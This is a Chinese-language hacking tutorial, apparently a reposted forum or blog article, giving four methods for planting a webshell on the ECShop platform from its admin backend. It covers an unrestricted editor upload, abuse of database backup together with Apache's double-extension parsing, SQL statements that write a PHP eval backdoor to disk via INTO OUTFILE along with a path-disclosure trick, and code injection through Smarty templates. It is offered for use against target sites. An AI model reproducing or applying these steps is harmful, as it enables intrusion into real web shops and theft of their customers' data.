方法一：龍兒心發(fā)明的，版本未定，估計都行。

進入后臺-系統設置-Flash播放器管理

可以上傳任意文件。

[includes/fckeditor /editor/filemanager/connectors/php/config.php文件對Media沒有任何限制，直接Type=Media 上傳你的webshell，訪問路徑為http://target/images/upload/Media/xxx.php]

方法二：另外一種是利用ecshop后臺的數據庫備份功能

這里選擇自定義備份，目的是使你備份出來的文件盡量的小，要是太大的話也很麻煩。

然后去前臺留個言，內容是我們的一句話木馬，接著在后臺選擇備份ecs_feedback這張表，就是存放留言的表，如圖：

然后會顯示備份成功。

但是ecshop備份的文件都強行會在你填的備份的名字后面加上.sql擴展名(元備份名我填的是l4yn3.php)，如圖。

這么做無非就是提高安全性，可是設計者忽略了一個問題，如果php是在apache下運行的，利用apache的文件解析漏洞這種方式形同虛設。
因為apache有個漏洞就是對文件名是1.php.sql這種形式，只要最后的文件擴展名是apache不能能解析的，他就會按照php文件來解析它，那在這里sql文件就是apache不能夠解析的文件，那么他理所當然會把這個文件當作php文件來執(zhí)行。

所以如果是apache+php的話，即使文件名變成了上面這樣，也可以正常解析，你所需要做的就是點一下備份后的鏈接。
所以您看出來了，這種拿shell的方式是需要你的環(huán)境是apache+php的。而且還有個條件是GPC魔術轉換不能開啟，所以也很雞肋。

方法三：ecshop后臺有一個功能是sql查詢，如圖：

其實感覺在一個管理系統的后臺放這么個功能根本沒用，有多少網站管理員有這么高的覺悟，會用這個？
不過也不錯，便宜了我們小菜拿shell。
方法就像phpmyadmin一樣直接操作sql語句導出一句話木馬拿shell。
語句如下：

show databases;
use 數據庫名;
 create a(cmd text not null);
 insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '導出路徑';
drop table if exists a;

很常規(guī)的語句。也許有人會問不知道網站路徑怎么辦，那要導出到哪呢？這里有一個技巧就是 use 數據庫名; 這句話，其實在這個sql查詢功能中默認用的數據庫就是本網站的數據庫，開發(fā)者設計的時候不會考慮你去use 其他的數據庫，所以這里你用"use 數據名庫"這句時，會產生一個警告，但并不影響sql的運行，卻可以成功爆出網站的路徑，多次測試均成功，如圖：

這樣就爆出了路徑，用于導出。

但是有個問題是你最后outfile文件時如果不是mysql的root權限，是沒有權限導出的，所以這種方法必須要求你的mysql權限為root。

方法四：這招簡單方法拿shell

進后臺。如下步驟：

插一句話，點確定之后訪問http://www.***.com/myship.php

這個方法的原理據說是ECSHOP的smarty模板機制是允許直接執(zhí)行php代碼，從而導致漏洞產生。我的smarty沒什么了解，不過會努力的。

ps：遇到了個linux的，權限限死，不給運行，直接插到頁面里直接運行！

第五種：oldjun大牛提供的據說條件更苛刻我就不轉了，需要時大家自己找吧！

逍遙復仇點評：二、三種方法都有一定的前提條件，一、四如果通殺蠻爽的，大家自行測試！~
本文由逍遙復仇（http://www.cqzh.cn/）辛苦整理，轉載請注明，謝謝合作~！

最新評論